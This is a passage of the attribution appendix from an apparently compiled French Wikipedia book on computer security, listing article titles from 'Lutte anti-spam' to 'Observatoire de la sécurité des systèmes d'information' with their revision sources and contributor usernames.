Lutte anti-spam Source: http://fr.wikipedia.org/w/index.php?oldid=90171604 Contributeurs: Abrahami, AlexB, Antibaba, AntonyB, Apokrif, Arzach, Ata100t, Atpnh, Autobahn.Babies, BMR, Baronnet, Barraki, Benjamin Pineau, Benjism89, Bilou, Biomin, Bob08, Bobodu63, Chaoborus, Chaps the idol, Chrono1084, Civis26, Cousinp, Coyau, Cvbn, Céréales Killer, Dadu, David Berardan, Dereckson, Djam, DocteurCosmos, Eiffele, Elfi, Elg, Fborsa, Fm790, Fr-locutus, Gdgourou, Gede, Guimauve2, Haypo, Hbbk, Isaac Sanolnacov, JB, JackPotte, JeanPhir, Jerome66, Jimmy, Jmax, Jose-marcio, Komandor, Larry, Laurent Nguyen, Lavabo bidet, Leag, Lepediatre, Lgd, Lhiver12, Lillebr, Lomita, Mahlerite, Maloq, Malta, Manu1400, MathsPoetry, Maxxtwayne, MetalGearLiquid, Michelet, Mig, Moez, Momomama, Mutichou, Nix 35, Nono64, Népomucène, Pautard, Peter17, Piblo, Pok148, Rani777, Rhadamante, Richardbl, Romain Bignon, Saimonn, Sherbrooke, Spamkill, Speculos, Stephane.aulery, T, T.vanderkluft, Temesis, The RedBurn, Tieno, Vazkor, Velero, Vincent.giersch, Vspaceg, Vyk, Wikig, Xofc, YannTech, Zazaonwoueb, Zetud, Ziron, 239 modifications anonymes

Pare-feu personnel Source: http://fr.wikipedia.org/w/index.php?oldid=90167647 Contributeurs: Didier Misson, Jef-Infojef, Koko90, Kriss06, MetalGearLiquid, T, Tieno, 2 modifications anonymes

Analyseur de paquets Source: http://fr.wikipedia.org/w/index.php?oldid=91228007 Contributeurs: A3 nm, Achraf, Agreu, Akeron, Aris, Cantons-de-l'Est, Cphil, Elg, Elnon, Genium, Golfestro, Grebig, Hitoride, ILJR, Jistrum, JujuTh, Laddo, Lucky, Med, NeMeSiS, Neustradamus, NexusNet, Nyco, Olrick, Popo le Chien, Ripounet, Scls19fr, Slimanous, T, Tieno, Ycarus, Zil, 15 modifications anonymes

Ad-Aware Source: http://fr.wikipedia.org/w/index.php?oldid=92494755 Contributeurs: Airelle, Bayo, Bender, Cœur, Dadu, Eek, Fborsa, Francois Trazzi, Genium, Ghost dog, InternetProfil, Jules78120, Kuxu, Leag, Manu1400, MetalGearLiquid, Mig, Peter17, Sebleouf, Serged, Silex6, Tieno, Tonton Tony, 24 modifications anonymes

BSD Jail Source: http://fr.wikipedia.org/w/index.php?oldid=89883366 Contributeurs: Casablanca1950, Comte0, Dereckson, Elfix, Epommate, Fatnerf, GLec, Haypo, Le sotré, Liné1, Nyco, Sherbrooke, Th. Thomas, Tieno, Tucsouffle, Zejames, 5 modifications anonymes

Chroot Source: http://fr.wikipedia.org/w/index.php?oldid=93104627 Contributeurs: Copros, Elalitte, Epommate, GLec, Isaac Sanolnacov, JackPotte, Jcpconsult, Manu1400, MistWiz, Mro, NeqO, Nyco, Pautard, Psychoslave, Sanao, Sebleouf, Tieno, Toutoune25, 7 modifications anonymes

OpenSSL Source: http://fr.wikipedia.org/w/index.php?oldid=93847004 Contributeurs: Agrandville, AntoineI, Arm@nd, Askywhale, Badmood, Binou, Dake, Elg, Epommate, Givet, HLenormand, Lacivelle, Love Sun and Dreams, NeMeSiS, Neustradamus, Nice Breakfast, Nodulation, Nyco, Okki, Philippe lhardy, Poleta33, Romanc19s, Ryo, TiChou, Tieno, Toutoune25, Yanngeffrotin, 20 modifications anonymes

HijackThis Source: http://fr.wikipedia.org/w/index.php?oldid=89952171 Contributeurs: Akiry, Angeldark, Bloodqc, Cham, Champagne, Darkoneko, IAlex, Kesiah, Korg, Manu1400, Nono64, Nucleos, Pabix, Padawane, Pamputt, Romanc19s, Sebb, T, Tieno, 24 modifications anonymes

Chkrootkit Source: http://fr.wikipedia.org/w/index.php?oldid=92494450 Contributeurs: Bob08, Didier Misson, Dromygolo, Janiko, Lacivelle, Mythos75, NeMeSiS, Neustradamus, Nodulation, Okki, Raph, Romanc19s, Tieno, 7 modifications anonymes

ClamAV Source: http://fr.wikipedia.org/w/index.php?oldid=92494892 Contributeurs: 2A02:8420:70FE:1B00:721A:4FF:FEB0:56E4, Arm@nd, Badmood, Barthelemy, Didier Misson, Francois.Nautré, Gédé, Harobed, Hemmer, Jgourault, Jon207, K'm, Koko90, Lacivelle, Litlok, Lomita, MakiZen, Mathieu1986, Mathieuclement, Mro, Mythos75, NeMeSiS, Neustradamus, Nono64, Ottosimilar, Pays, Philant, Piglop, Pulsar, Régis Décamps, SF007, Silex6, Slm85, Smily, Tieno, Toutoune25, Yazou, 43 modifications anonymes

NOD32 Source: http://fr.wikipedia.org/w/index.php?oldid=94418426 Contributeurs: Anthony5151, Aquatikelfik, Arkanosis, Cadey, Christophe Dioux, Dadu, Erud, Esprit Fugace, Fborsa, Habertix, Himanis Das, Ironworks, John Keats 78, Koko90, Lgd, Mixouille, Mythos75, Patrias, Solisius, Thadram, Tieno, Ver des Roches, Web33, 43 modifications anonymes

Back Orifice Source: http://fr.wikipedia.org/w/index.php?oldid=89840853 Contributeurs: A3 nm, Badmood, Boris Christ, ChrisJ, Chôji, Cr0vax, Dodot, François-Dominique2, Gzen92, Hashar, Jean-no, Jerome66, Kuxu, Liquid 2003, Mister BV, Myleslong, NeMeSiS, Romainhk, Romanc19s, Ryo, Sebletoulousain, Sodatux, T, Tieno, Ukulele, 8 modifications anonymes

Secure Shell Source: http://fr.wikipedia.org/w/index.php?oldid=94462119 Contributeurs: -Nmd, 2001:6F8:14DC:2:1E65:9DFF:FE26:33C3, Al Maghi, Apokrif, Aris, Badmood, Bob08, Capbat, Chico75, Dake, Damienfloss, DecereBrain, Dlonceveau, Dormeur83, Erwin, Fedmahn, Florent, GLec, Genium, Grimlock, Gzen92, Herman, Hlm Z., JLM, Jago, Jerome66, Jmax, Jmsrt, Jul2609, Kaare, Kaffeine, Kropotkine 113, Laddo, Laocian, Le schtroumpf, LeGrosWinnie, Litlok, Maggic, MagnetiK, MattF, MatthieuCastet, Med, MetalGearLiquid, Mirgolth, Mro, Nebula38, Neustradamus, Noar, Nutsy, Od1n, Olrick, Orthogaffe, Oz, Pautard, Peter17, Phe, Philou1024, PierreCG, R, SRombauts, Sador, SeeSchloss, Sherbrooke, Smaret, Sml, Symac, Tarquin, Theocrite, Tieno, Toutoune25, Urluba, Van Rijn, Vglenny, Vincent Ramos, Winged-stone, Youssefsan, 97 modifications anonymes

Nessus (logiciel) Source: http://fr.wikipedia.org/w/index.php?oldid=89932824 Contributeurs: Anarkman, Badmood, Bibi Saint-Pol, ChrisJ, Copros, Dake, Dr gonzo, Gzen92, Gédé, HERMAPHRODITE, Harobed, MathsPoetry, Maxxtwayne, Melkor73, Mro, Mégabeums, Romanc19s, Stangman, Tieno, Toutoune25, Vm666, Zizomis, 6 modifications anonymes

Nmap Source: http://fr.wikipedia.org/w/index.php?oldid=94505863 Contributeurs: Anarkman, Apperrin, Arm@nd, Arno., Badmood, Chouca, Dadu, Ecid, Expression libre, Fguerraz, Freewol, Hakadel, Haypo, Ianfromparis, Janiko, Jogg, La Cigale, Litlok, Lyondif02, MathsPoetry, Maxxtwayne, MisterMatt, NeMeSiS, NexusNet, Nono64, Overmac, Petrus lt, Phe, Piglop, Poulos, ProgMan, Romanc19s, SebastienGioria, Shawn, Silex6, Stéphane33, Sémhur, T, Taonas, Theocrite, Tieno, Toutoune25, Vm666, Xofc, 31 modifications anonymes

Traceroute Source: http://fr.wikipedia.org/w/index.php?oldid=90319936 Contributeurs: Badmood, Bob08, Bortzmeyer, Cirdec, Erwin, Florent Brisson, Fluzz, GLec, Genium, Isaac Sanolnacov, Jmax, Kilith, Mailbox, Markadet, Momow, Mro, Neofutur, Nickele, Nodulation, Nono64, Panda, PascalBlot, Psychoslave, Ryo, Sbrunner, Schmorgluck, Serged, ShreCk, Speculos, Tieno, Zil, 27 modifications anonymes

GNU Privacy Guard Source: http://fr.wikipedia.org/w/index.php?oldid=92494277 Contributeurs: Alexandre-ct, Arm@nd, Badmood, Bub's, ClementSeveillac, Dadu, Dake, DecereBrain, Deuxpi, FDo64, Francois Trazzi, François-Dominique, Genium, Grondilu, Hercule, Iunity, Jbar, Jeanot, Laocian, M-Rick, Mabu, Melkor73, MisterMatt, NeMeSiS, Neustradamus, Nicopedia, Nodulation, Oz, Pautard, Philippe.petrinko, R4f, Sebleouf, Silex6, Skamp, SuperFlo, T, The Geek, Tieno, Toutoune25, Traroth, Xulin, Zakke, ZeroJanvier, Zetud, 23 modifications anonymes

Pretty Good Privacy Source: http://fr.wikipedia.org/w/index.php?oldid=93417240 Contributeurs: A2, Aboumael, Alvaro, Amine Brikci N, Asclepias, Atvaark, Badmood, Baffclan, BonifaceFR, Bortzmeyer, Capripot, Carbone14, Clandsheere, Céréales Killer, Dadu, Dake, DecereBrain, Demonique, Esprit Fugace, Francis, François-Dominique, HLenormand, Hercule, Jeanot, JmCor, Jules78120, Marc-André Aßbrock, Mirgolth, MisterMatt, Neustradamus, Orthogaffe, Orthomaniaque, Oz, Philippe.petrinko, Pit, R4f, Rhadamante, Rinaku, Sador, Sam Hocevar, Silex6, T, Theocrite, Tieno, Tuilindo, Webby42, Xulin, 41 modifications anonymes

Netfilter Source: http://fr.wikipedia.org/w/index.php?oldid=92494364 Contributeurs: Abracadabra, Achraf, Alva8, Archimëa, Arm@nd, Artiflo, Babskwal, Badmood, Bignole, Bikepunk2, Cmaussan, Disparate1980, Diwann, Drazzib, Epommate, Erud, Greguar, Grondin, Hashar, Haypo, Hemmer, Jef-Infojef, Jengelh, Jrcourtois, Koko90, Korrigan, Linan, Liné1, Liquid 2003, Livreys, Med, Melkor73, Moala, Moumousse13, NeMeSiS, Pankkake, Peter17, PhilippeH, Piglop, Pinpin, Ploum's, Posicouac, R, Record, Regit, Rinjin, Romanc19s, Rémih, SF007, Sam Hocevar, Smily, Steve HUBERT, T, Tibauk, Tieno, Tonymainaki, Toutoune25, Vglenny, Vincnet, Vlad, Xerus, 49 modifications anonymes

FreeBSD Source: http://fr.wikipedia.org/w/index.php?oldid=94499889 Contributeurs: A3 nm, Arm@nd, Artefact2, AviaWiki, Badmood, Baf, Benjamin Pineau, Berrandonea, Blackend, Bloubéri, Bouchecl, Bsdmaniak, Chaokoleofr, Christophe cagé, CommonsDelinker, Copros, Coyau, Cédric, David Berardan, David Marec, Dereckson, Detharonil, Doch54, Dsant, DualGoeSlime, Dudumortier, El Comandante, Fantec, FlorentThoumie, Francois Trazzi, GLec, GaMip, Garfieldairlines, Germ, Gorrk, Grecha, Greudin, Hashar, Hercule, Herr Satz, Highlander, Hmichelon, HybridTheory2, Isaac Sanolnacov, Iznogood, Jackux32, Jastrow, Jml2, JujuTh, Koko90, Kyle the hacker, Lachaume, Lady freyja, LeToff, Leag, Lecid, Liné1, LoX, Looxix, Louiz', Manchot, Manu fred, Manu1400, Marin M., Mathieu Prevot, Matrixise, Melkor73, Mig, Mikayé, Moe, Mossburg, NeMeSiS, NicoV, Nodulation, Nono64, Nyco, Olivier Hammam, Overmac, Oyp, Oz, Pamputt, Plic, Posicouac, Prolineserver, Psychoslave, QuebecPureLaine, Quirk, Rani777, Rbuj, Rhadamante, Rinaldum, Romanc19s, Rudloff, Ryo, Sheltem, Sherbrooke, Sigma, Silex6, Sources et contributeurs de l’article 476

Spooky, Stéphane33, THA-Zp, Tavernier, Tenval, Th. Thomas, The SpaceFox, Tibauk, Tieno, Traroth, TsunaQuake, Vazkor, Wilbern Cobb, Yf, Yusf, Yyyy, Zlaka, Zlhu.int, Zylabon, 126 modifications anonymes

NetBSD Source: http://fr.wikipedia.org/w/index.php?oldid=92529763 Contributeurs: Akiry, Arm@nd, Auxerroisdu68, Badmood, Bbullot, Bibi Saint-Pol, Bortzmeyer, Brendàn, Camjelemon, Chico75, Christophe cagé, Cédric, Fluti, Francois Trazzi, GLec, Isaac Sanolnacov, Jcabillot, Jef-Infojef, Joyce11, Kabs, Korg, Lady freyja, LeToff, Leag, Liné1, Ljcost, LoX, Malakian, Manalfer, Mannu, Med, Melkor73, Moa18e, Moala, Mro, Natmaka, NeMeSiS, NicoV, Nodulation, Not-Pierre, Olrick, Pamputt, Pascalv, Paul Bouchequet, Phe, Prolineserver, Psychoslave, Randruc, Rinaldum, Ryo, Samyra008, Satanfu, Sigma, Snark, THA-Zp, Traroth, TsunaQuake, Vazkor, Wilbern Cobb, script de conversion, ²°¹°°, 61 modifications anonymes

OpenBSD Source: http://fr.wikipedia.org/w/index.php?oldid=93038897 Contributeurs: A3 nm, Archimëa, Arm@nd, Armedblowfish, Artiflo, Autobahn.Babies, Badmood, Bdc43, Benjamin Pineau, Bibi Saint-Pol, Bloodqc, Bob08, Bsdmaniak, Bub's, Buzz, CYBz, Cantons-de-l'Est, Colico13, Coyote du 86, Cédric, Cévé, Damoun, Deansfa, Detharonil, Deweerdt, Echoray, Ecid, Emericpro, Francois Trazzi, GLec, Gonioul, Haypo, HellDragon, Hercule, Herr Satz, Highlander, Hopea, Im.olivierbois, Janizary, Jastrow, Jcabillot, JidGom, JnRouvignac, Joe le Kiffeur, Jon207, Kangou, Karl1263, Koko90, Lady freyja, Liné1, Lithium57, Looxix, Lyondif02, Manu fred, Manu1400, Marcv7, Matieux, Maxxtwayne, Melkor73, Mirgolth, Motodashi, Ndiver, NeMeSiS, NicoPMLegrand, NicoV, Nodulation, Nonas, Not-Pierre, Nyco, Overmac, Paul Bouchequet, Phe, Pierre-Yves Rofes, Rahl43, Rhadamante, Roby, RogueLeader, RustyBSD, Ryo, Rémih, Scullder, Silex6, Sithran, Skouratov, Slasher-fun, Stanlekub, THA-Zp, Theocrite, Tieno, Toutoune25, Traroth, Tristan Le Guern, Vazkor, Vlaam, Wilbern Cobb, Zaide, ^Amaury, script de conversion, 70 modifications anonymes

Adamantix Source: http://fr.wikipedia.org/w/index.php?oldid=89819265 Contributeurs: Aleksandrit, Arm@nd, Badmood, Francois Trazzi, La Cigale, Manchot, Romanc19s, Tieno, 1 modifications anonymes

ClosedBSD Source: http://fr.wikipedia.org/w/index.php?oldid=89818703 Contributeurs: Arm@nd, Badmood, Francois Trazzi, Koko90, Pautard, Rhadamante, Tieno, 2 modifications anonymes

IPCop Source: http://fr.wikipedia.org/w/index.php?oldid=92530370 Contributeurs: (:Julien:), Aerx, Arm@nd, Badmood, Chealer, Dc-mic, Duloup, Ejacquet, Elg, Emericpro, Flobel, Fluti, Francois Trazzi, Gene.arboit, Gium, Huygens 25, IAlex, Jef-Infojef, Jrcourtois, Julien.dumont, Koko90, Loveless, Ltrlg, Manchot, Melkor73, Mercurea, NeMeSiS, Neoflow, Neustradamus, Nodulation, Nono64, Pamputt, Pgombeer, Rat geudin, Rebel36400, Sam Hocevar, Silex6, Stéphane33, Tieno, Ultramedecine, Vazkor, Yazou, 32 modifications anonymes

Grsecurity Source: http://fr.wikipedia.org/w/index.php?oldid=89783849 Contributeurs: Aoineko, BasEI, Instigate cjsc (Narine), Nono64, Pautard, Phe, Ploum's, Posicouac, Romanc19s, Stéphane33, Tieno, Toutoune25, Trou, Zeroheure, 7 modifications anonymes

SELinux Source: http://fr.wikipedia.org/w/index.php?oldid=93042876 Contributeurs: Arnooo, Badmood, Bob08, Cohomologique, Haypo, JnRouvignac, Jonathan.renoult, JoseREMY, Koteks, Lyondif02, Mortal, NeMeSiS, Nico-s, Pamoduckio, PouX, Romanc19s, Ryo, SebastienRodriguez, Spooky, Stijk, Surfoo, Thingol, Tieno, Toutoune25, Vazkor, Yopohari, ZeroJanvier, 15 modifications anonymes

Carte à puce Source: http://fr.wikipedia.org/w/index.php?oldid=94584841 Contributeurs: 5afd4770411ca76c, Aeleftherios, Aesopos, Alan, Amhantar, Amnesia fr, Arnaudbas, ArséniureDeGallium, Asclepias, BMR, Badmood, Bapt1steD, Bazook, Benjamin.chevalier, Bertol, BlueGinkgo, Cbastf, Charlesingalls759, Chatsam, Cheupi, Chtfn, ClaireASK, CommonsDelinker, Coolspy, Coyote du 86, Cricri054, Ctve, Cédric Boissière, Céréales Killer, Cœur, Daniel Vesque, Dastmo, Desaparecido, Divpload, Dorval28, Ediacara, Elfix, Emmanuel legrand, En passant, Epommate, Erween, Esprit Fugace, GL, Gene.arboit, Gonioul, Greudin, Gseguin, Gz260, Gzen92, Hercule, Herr Satz, Hexasoft, Hiebel, Hu12, Inisheer, Isaac Sanolnacov, Iznogood, JB, JLM, Jafeluv, Jean-luc goudet, Jerome66, Jide4525, Jmax, Johann.d, Kiero63, Kilith, Kndiaye, Knguyeniiifr, Kontributeur, L majid, L'amateur d'aéroplanes, Laurent Nguyen, Lblouis, Le choucas, Lechristo, Lgd, Litlok, Logix16, Longrais, Looxix, Lu.Rob, MahomPet, Mayerwin, Mercator, Meszigues, MickaëlG, Mikayé, MistWiz, Mlamineka, Mourial, MoussiChaka, Moyg, Ncommiss, Neonderthalis, Nico45, Nirckly, Nono64, Nutsy, Oxo, Pano38, Papardelle, Pautard, Pcreux, Pgreenfinch, Phe, Pixeltoo, Pmx, Pulsar, Pymouss, Roland Moreno, Romainhk, Romary, Rémih, Saihtam, Salsero35, Sanao, Sdamay, Sdispirtech, Sebjarod, Sebleouf, Seto, Sherbrooke, Slasher-fun, Smaret, Speculos, Ste281, Stefan Ivanovich, Stephen62, Tieno, Tiraden, Valéry Beaud, Vazkor, Vlopes, Vyk, Walpole, Wikig, Woauw, Woww, Xavier289, Xfigpower, Xic667, Zedh, Zeenon, Zeugma fr, Zil, script de conversion, Égoïté, 218 modifications anonymes

Cisco PIX Source: http://fr.wikipedia.org/w/index.php?oldid=91329381 Contributeurs: Arnaud.Serander, Ekx27, Jef-Infojef, Jrenier, Koko90, Laurent Nguyen, Liné1, Mro, Neustradamus, NexusNet, Nono64, Okki, Oxo, Padawane, Selcomad, Tieno, Xcharonnat, 16 modifications anonymes

Hardware Security Module Source: http://fr.wikipedia.org/w/index.php?oldid=93136701 Contributeurs: Asyd, Christian.wkp, Criric, JB, MistWiz, Nicolas Ray, Speculos, T, Thanatonaute, Toutoune25, 24 modifications anonymes

YesCard Source: http://fr.wikipedia.org/w/index.php?oldid=93190842 Contributeurs: 2001:41D0:2:2BE3:11:4D21:BFDA:2C4D, 633k, Apokrif, Badmood, Chico75, DavidL, DocteurCosmos, Expertom, Fraifrai, Grdz, Hercule, Jrmy, La Cigale, Litlok, Meodudlye, NeMeSiS, NicoV, Ofol, Pautard, Pic-Sou, Rigolithe, Romanc19s, Rémih, Shawn, Silanoc, T, Tavernier, Tieno, Vazkor, Webgardener, 15 modifications anonymes

Trusted Platform Module Source: http://fr.wikipedia.org/w/index.php?oldid=93998174 Contributeurs: A3 nm, Antistress, Badmood, Chat mauve, Dsant, Eusebius, FirasBéjaoui, Nico-s, R, Romanc19s, Tieno, Toutoune25, Wadzar, Wagaf-d, 10 modifications anonymes

SecurID Source: http://fr.wikipedia.org/w/index.php?oldid=90215299 Contributeurs: Asabengurtza, Badmood, Casamtl, CommonsDelinker, Dubdub, Jef-Infojef, Koko90, Nono64, Philippe rogez, Quietus, Randmot, Sanao, Smaret, Tegu, Tieno, Tos42, Toutoune25, Ventury-Networks, 9 modifications anonymes

Unified threat management Source: http://fr.wikipedia.org/w/index.php?oldid=90208539 Contributeurs: Abdallah.d, Chris a liege, Haypo, Herr Satz, Jef-Infojef, Keriluamox, Koko90, Mederic.claassen, Nono64, Playtime, Sablas, Stéphane33, Tieno, 31 modifications anonymes

Cryptographie Source: http://fr.wikipedia.org/w/index.php?oldid=94387798 Contributeurs: Agrandville, Anthere, Athymik, Badmood, Balougador, BdeBreuil, Bender, BlaF, Bouchecl, Bzhqc, ClementSeveillac, Crochet.david, Dake, Deansfa, Dewi78, DiamondDave, Dirac, Djapipol, Djiboun, DocteurCosmos, Dtcube, Elrik, Euterpia, FILLL, FitzSai, FlashX, Francois Trazzi, François-Dominique, Freewol, GLec, GabHor, Grondilu, Guillaume.arcas, Gzen92, HLenormand, Hbour, HenriMartin, Hercule, Heureux qui comme ulysse, Hors bord, Hypnocrate, Inisheer, Iznogood, Jep, Jramio, Jyp, Kelson, Kilith, Koubutsu, Koxinga, Learningeagle, Liquid 2003, Lmaltier, Lomita, Looxix, Marc Mongenet, MickaëlG, Mikayé, Mit-Mit, Moumousse13, Mro, Myrabella, NeMeSiS, Nemesis, Nice Breakfast, Nodulation, Oblic, Orthogaffe, Oz, PAC2, Pixeltoo, Prosopee, Proz, Pseudomoi, Psychoslave, QuoiNonne, Romainhk, Rémih, Sador, Salsero35, Sanao, Savh, Sherlock38fr, Slinge, Tegu, Thewayforward, Tieno, Toto Azéro, Tpevirus, Tracky, Tubalubalu, Vazkor, Wadzar, Wilbern Cobb, Wortex, Xerus, Zizomis, oto.inria.fr, script de conversion, 97 modifications anonymes

Stéganographie Source: http://fr.wikipedia.org/w/index.php?oldid=94469986 Contributeurs: A3 nm, Abracadabra, Aoineko, Ardus Petus, Badmood, Bayo, Bazook, Camille Grey, Candelabre, Cham, CommonsDelinker, Coyau, Dake, David Berardan, Dtcube, Eltrai, Eon2004, Eskimo, Eunostos, Fapp, Flo, Fpeters, Francis Vergne, Francois Trazzi, François-Dominique, FreD, Galithiel, Gilles MAIRET, Gilles.L, Goldy, Gotrek, Gribeco, Grimlock, Grizzy Kret, Guillaume70, Gzen92, Haypo, Herman, IJKL, Iunity, Iznogood, JmCor, Jno972, Kelson, Korg, Laurent Nguyen, Leszek Jańczuk, Lmaltier, Madd0, Manu1400, Marc.m, Matei13, Maurilbert, MaxLanar, Michel1961, Mikayé, Mkossa, Nameless44, Nataraja, ObiWan Kenobi, Pabix, Pallas4, Phe, Qsinagra, RM77, Raude, Remi.mahel, Remsirems, Rigolithe, Ripounet, Robert Landon, Roby, Ryo, Rémih, Sador, Sam Hocevar, Sand, Serged, Sherbrooke, Sisqi, Sylenius, TBTB, Tegu, Teumteum, Tieno, Tornad, Tuxfan79, Tuxlinuxien, Vazkor, Xavier Combelle, ZeroJanvier, Zetud, ZipoBibrok5x10^8, oto.inria.fr, script de conversion, Éclusette, 158 modifications anonymes

Certificat électronique Source: http://fr.wikipedia.org/w/index.php?oldid=94578541 Contributeurs: Badmood, Bortzmeyer, ClementSeveillac, CommonsDelinker, Deansfa, Dhatier, Esa, Gfox, Gzen92, HERMAPHRODITE, Haypo, Herman, Isaac Sanolnacov, Jbar, Jerome66, Jordav, La Cigale, M'vy, Marc BERTIER, Mig, Mika, Ncharp, Neustradamus, NicoV, Nono64, P92, Pautard, Rigolithe, Roumanet, Sacamol, Sherbrooke, Smaret, T, Tieno, Val92160, Vincent Aravantinos, WikiBuggy, Yves30, 57 modifications anonymes

Identité numérique Source: http://fr.wikipedia.org/w/index.php?oldid=81841575 Contributeurs: Ahbon?, Fm790, Herr Satz, Kropotkine 113, Lighter14, Theoliane, Vyk, 4 modifications anonymes

Infrastructure à clés publiques Source: http://fr.wikipedia.org/w/index.php?oldid=94475789 Contributeurs: Agrajag, Badmood, Bibirico, BiffTheUnderstudy, Bob08, ClementSeveillac, Dereckson, Dollymoon, Epommate, Escaladix, GAllegre, Gene.arboit, Giudicelli, Glecolle, Gribeco, HLenormand, Hbbk, Hercule, Herman, Iceman2001, J-p krelli, Jef-Infojef, Jerome66, JujuTh, Koudrabi, Leag, M.oliveira, Maleloria, Mig, Mika, Nicolas8241, Nono64, Nroll, Oxo, Oz, Patrick.duboys, Pautard, Punx, Quenechdu, Rigno, Sampont, Sgonidec, Shawn, Smaret, Solensean, Solveig, Stef48, Tegu, Tieno, Toutoune25, Vlaam, Wololoooo, Zonzon, 80 modifications anonymes

Signature numérique Source: http://fr.wikipedia.org/w/index.php?oldid=94765069 Contributeurs: 20ce, AXRL, Alain.Darles, Alphos, Apokrif, Badmood, Benbobo55, Buzz, Cchantep, ClementSeveillac, CommonsDelinker, Céréales Killer, DecereBrain, Dictao, DomQ, Draco3565, Dtcube, Dématérialisation, Erasoft24, Fbboisclair, Franck-13-1951, Gzen92, HLenormand, Haypo, Hca, Herman, Iggy78, JLM, JackPotte, Jbar, Jerome66, Kilith, Klipe, Koenig, Laurent Nguyen, Lomita, Looxix, Malosse, Mantriss5, Marc Mongenet, MathsPoetry, Michel SALES, Mika, Mikayé, Mikue, Neo62matrix, O0SLA0o, Orthogaffe, Oz, Patdub2006, Pautard, Rudloff, S.dubourg, Sador, Schnouki, Signamys, Sofian, Stephen62, Sweater, Thbz, Tieno, Tucsouffle, WalterMask, YvesRoy, Zitoun, Zizomis, script de conversion, 83 modifications anonymes Sources et contributeurs de l’article 477

Canal caché Source: http://fr.wikipedia.org/w/index.php?oldid=90156488 Contributeurs: Badmood, Birger Fricke, Camille Grey, Koko90, LUDOVIC, Pline, Romainhk, Sebbb, T, Tieno, Z653z, 1 modifications anonymes

Trusted Computer System Evaluation Criteria Source: http://fr.wikipedia.org/w/index.php?oldid=89899501 Contributeurs: Bap, GL, GLec, Givet, Isaac Sanolnacov, Jeanot, T, Tieno, 3 modifications anonymes

Information Technology Security Evaluation Criteria Source: http://fr.wikipedia.org/w/index.php?oldid=89975756 Contributeurs: Badmood, Bob08, Litlok, Papagrieng, Pautard, T, Tieno, Toutoune25, 2 modifications anonymes

Critères communs Source: http://fr.wikipedia.org/w/index.php?oldid=90138742 Contributeurs: Ange Gabriel, Atatdotat, Badmood, Bob08, Cdelahaye, DainDwarf, Dalb, GLec, Jef-Infojef, Kanjy, Koko90, Nono64, Outs, Pautard, Phe, Pixeltoo, Speculos, T, Tieno, Vincent.vaquin, Ydroneaud, 12 modifications anonymes

ISO/CEI 27001 Source: http://fr.wikipedia.org/w/index.php?oldid=94477550 Contributeurs: AFNOR, Awk, BSIfr, Badmood, Baktiss, Beebooo, Billinghurst, BonifaceFR, Casablanca1950, Ccmpg, EBIOS, Eulrich, FDo64, Franklin82, GLec, Goliadkine, Gonioul, Haypo, Hercule, Iznogoud, JosselinBe, Julie74, LSN IAE 86, La Cigale, Laurent Nguyen, Masterguigui, MathsPoetry, Pautard, Pixeltoo, Rominet, T, Tavernier, Tcharvin, Tieno, Vargenau, Vincent.vaquin, YvesRoy, 29 modifications anonymes

ISO/CEI 17799 Source: http://fr.wikipedia.org/w/index.php?oldid=89848644 Contributeurs: (:Julien:), Awk, Badmood, GLec, Haypo, Hercule, Iznogoud, Karimakov, Lmaltier, Maggic, Pautard, Phe, Pixeltoo, Romary, T, Tcharvin, Thbz, Tieno, Vargenau, Xmcolabo, Zelda, 12 modifications anonymes

Computer Emergency Response Team Source: http://fr.wikipedia.org/w/index.php?oldid=94733200 Contributeurs: Anthena, Atatdotat, Badmood, ClaudeX, Deep silence, Fradelik, Jarfe, MRick, Maijin21, Neitsa, Pautard, Phe, Sherbrooke, Thedreamstree, Tieno, Tiksaju43, Xmcolabo, 42 modifications anonymes

Information Security Forum Source: http://fr.wikipedia.org/w/index.php?oldid=90145566 Contributeurs: Badmood, Darkoneko, Loveless, Mattho69, Nono64, Pautard, Pejman, Romanc19s, T, Tieno, 7 modifications anonymes

Open Web Application Security Project Source: http://fr.wikipedia.org/w/index.php?oldid=90604829 Contributeurs: Randmot, SPoint, Tieno

CERT Coordination Center Source: http://fr.wikipedia.org/w/index.php?oldid=90138351 Contributeurs: Badmood, Loveless, Sahara, Tieno, 3 modifications anonymes

International Information Systems Security Certification Consortium Source: http://fr.wikipedia.org/w/index.php?oldid=91026422 Contributeurs: Badmood, Loveless, Nono64, Pautard, Tieno, 4 modifications anonymes

Trusted Computing Group Source: http://fr.wikipedia.org/w/index.php?oldid=90323950 Contributeurs: A3 nm, Almacha, Alno, Badmood, Bob08, Chaoborus, Chris93, Eusebius, FirasBéjaoui, Gcruchon, JB, Jerome66, Jmfayard-fauxnez, La Cigale, Malalaterre, Mitch53, NicoV, Nodulation, Nono64, Orthogaffe, Pautard, Sand, Smily, Speculos, Tieno, Tintamarre, Toutoune25, Wadzar, Ycarus, Yukito, 32 modifications anonymes

Institut de la sécurité de l'information du Québec Source: http://fr.wikipedia.org/w/index.php?oldid=69894045 Contributeurs: Amicalmant, Badmood, Bouchecl, Es2003, Romanc19s, Tieno, 1 modifications anonymes

European Institute for Computer Antivirus Research Source: http://fr.wikipedia.org/w/index.php?oldid=93693105 Contributeurs: Bastien Sens-Méyé, Loveless, Michel421, NeMeSiS, Pays, Tieno, 5 modifications anonymes

Office fédéral de la sécurité des technologies de l'information Source: http://fr.wikipedia.org/w/index.php?oldid=90081704 Contributeurs: Badmood, Camille Grey, Kanjy, Keriluamox, Loveless, Nono64, Sherbrooke, Tieno

Club de la sécurité de l'information français Source: http://fr.wikipedia.org/w/index.php?oldid=77529699 Contributeurs: Casablanca1950, Chris93, FH, Lmaltier, Marsyas Panique, Tieno, Toutoune25, 11 modifications anonymes

Observatoire de la sécurité des systèmes d'information et des réseaux Source: http://fr.wikipedia.org/w/index.php?oldid=76794229 Contributeurs: Al Maghi, Badmood, Es2003, Givet, Melusyne, Orevenu, Peter17, Sebleouf, Tieno, 5 modifications anonymes

